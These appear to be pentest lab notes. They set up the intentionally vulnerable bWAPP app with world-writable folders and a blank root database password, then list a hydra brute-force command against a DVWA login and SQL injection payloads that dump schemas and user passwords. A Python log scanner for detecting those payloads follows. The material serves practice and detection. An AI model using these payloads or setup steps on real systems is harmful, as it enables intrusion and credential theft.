Burp Suite
Install bWAPP
- Download the file here
- Extract the file
- Move the files to /var/www/html on Linux, or to htdocs on Windows
- Next, run sudo chmod 755 -R bWAPP_latest
- Change to the path /var/www/html/bWAPP_latest/bWAPP
- Then run sudo chmod 777 passwords/ images/ documents/ logs/
- Then edit admin/settings.php to match your machine
$db_server = "localhost"; // your database server (IP/name), here 'localhost'
$db_username = "root"; // your MySQL user, here 'root'
$db_password = ""; // your MySQL password, here 'blank'
- Open a browser and enter the URL
http://localhost/bWAPP_latest/bWAPP/install.php
- Then click "Click here to install bWAPP."
- Then go to the URL
http://localhost/bWAPP_latest/bWAPP/login.php
BruteForce
hydra 192.168.xx.x -l admin -P /home/hard/Documents/password.txt http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect. :H-Cookie: security=low; PHPSESSID=xxxxxxxxxxxxxxxxxxxxxx"
SQL Injection
1' OR 1=1#
1' OR 1=1 union all select system_user(),user()#
1' OR 1=1 union select null,schema_name from information_schema.schemata#
1' OR 1=1 union select null,table_name from information_schema.tables#
1' OR 1=1 union select null,@@datadir #
1' OR 1=1 union select null,concat(first_name,0x0a,password) from users #
1' UNION SELECT database(),2-- -
1' UNION SELECT user,password from users#
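
To see what the payloads above look like from the server side, here is an added detection example (not part of the original notes) that scans web access-log lines for the same shapes: the OR 1=1 tautology, UNION SELECT, information_schema enumeration, @@ server variables and a trailing comment. The rule names, the /app/user.php path and the log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Rules modelled on the payload shapes listed above; names are this example's own.
RULES = {
    "tautology": re.compile(r"'\s*or\s+1\s*=\s*1", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(?:schemata|tables)\b", re.I),
    "server_var": re.compile(r"@@\w+"),
    # Trailing comment that cuts off the rest of the query; noisy on its own.
    "comment_tail": re.compile(r"(?:#|--\s-?)\s*$"),
}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan_line(line):
    """Return (client_ip, {param: [rule names]}) for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return None, {}
    hits = {}
    for name, value in parse_qsl(urlsplit(m.group(2)).query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded input.
        decoded = unquote_plus(value)
        matched = [rule for rule, rx in RULES.items() if rx.search(decoded)]
        if matched:
            hits[name] = matched
    return m.group(1), hits

def scan_log(text):
    """Return [(line_no, client_ip, hits)] for lines with at least one match."""
    out = []
    for no, line in enumerate(text.splitlines(), 1):
        ip, hits = scan_line(line)
        if hits:
            out.append((no, ip, hits))
    return out

# Constructed sample log (not captured traffic); path and addresses are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /app/user.php?id=1&Submit=Submit HTTP/1.1" 200 512
192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /app/user.php?id=1%27+OR+1%3D1%23&Submit=Submit HTTP/1.1" 200 4096
192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /app/user.php?id=1%27+UNION+SELECT+user%2Cpassword+from+users%23 HTTP/1.1" 200 2048
192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /app/user.php?id=1%2527+OR+1%253D1+union+select+null%252Ctable_name+from+information_schema.tables%2523 HTTP/1.1" 200 8192
"""

if __name__ == "__main__":
    for no, ip, hits in scan_log(SAMPLE_LOG):
        print(no, ip, hits)
```

Only GET query strings reach the access log; parameters sent in a POST body need the same rules applied at the application or WAF layer.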